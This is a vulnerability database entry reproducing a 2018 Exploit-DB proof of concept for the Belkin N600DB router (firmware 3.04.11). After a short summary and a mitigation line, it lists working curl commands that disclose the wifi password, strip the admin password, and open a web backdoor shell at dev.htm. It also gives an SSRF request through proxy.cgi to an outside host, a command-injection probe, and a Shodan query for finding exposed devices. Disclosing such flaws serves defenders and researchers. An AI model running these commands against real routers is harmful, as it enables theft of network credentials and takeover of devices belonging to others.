Belkin N600DB Wireless Router | Multiple Vulnerabilities

vendor:

N600DB Wireless Router

by:

Wadeek

8.8

CVSS

HIGH

Multiple Vulnerabilities

N/A

CWE

Product Name: N600DB Wireless Router

Affected Version From: 3.04.11

Affected Version To: 3.04.11

Patch Exists: YES

Related CWE: N/A

CPE: h:belkin:n600db_wireless_router

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2018

Belkin N600DB Wireless Router | Multiple Vulnerabilities

The Belkin N600DB Wireless Router is vulnerable to multiple security issues, including wireless fingerprinting, web fingerprinting (with locked web interface), disclosure of wifi password, closed 'HTTPD server' port, web backdoor, and server-side request forgery (HTTP/FTP).

Mitigation:

Users should update their router to the latest firmware version and ensure that the web interface is locked.

Source

Exploit-DB raw data:

# Exploit Title: Belkin N600DB Wireless Router | Multiple Vulnerabilities
# Date: 16/01/2018
# Exploit Author: Wadeek
# Hardware Version: F9K1102as v3
# Firmware Version: 3.04.11
# Vendor Homepage: http://www.belkin.com/fr/support/product/?pid=F9K1102as
# Firmware Link: http://cache-www.belkin.com/support/dl/F9K1102_WW_3.04.11.bin

== Wireless Fingerprinting ==
#===========================================
:ESSID: "belkin.XXX"
:Mode: Master
:Encryption key WPA2 Version 1 CCMP PSK: on
:Wireless Password/PIN: 8-alphanumeric
:DHCP: enable (192.168.2.1)
:MAC Address: 58:EF:68
#===========================================

== Web Fingerprinting (With Locked Web Interface) ==
#===========================================
:www.shodan.io: "Server: httpd" "Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0" "100-index.htm"
#===========================================
:Device images:
/images/troubleshooting/checkWires.png (600x270)
/images/troubleshooting/startModem.png (600x270)
/images/troubleshooting/stopModem.png (600x270)
/images/troubleshooting/restartRouter.png (600x270)
#===========================================
:Hardware version,Firmware version,Serial number,...: /cgi/cgi_st.js && /cgi/cgi_dashboard.js
#===========================================

== PoC ==
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Disclore wifi password: 
curl --silent "http://192.168.2.1/langchg.cgi" 
|| 
curl --silent "http://192.168.2.1/adv_wifidef.cgi"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Closed "HTTPD server" port:
curl --silent "http://192.168.2.1/removepwd.cgi" --data ""
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Web Backdoor:
http://192.168.2.1/dev.htm
> ?
> sh
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Server-Side Request Forgery (HTTP/FTP):
{45.33.32.156 == scanme.nmap.org}
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=http://45.33.32.156/"
||
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=ftp://45.33.32.156/"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
:Command Injection:
curl --silent "http://192.168.2.1/proxy.cgi?chk&url=--help"
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!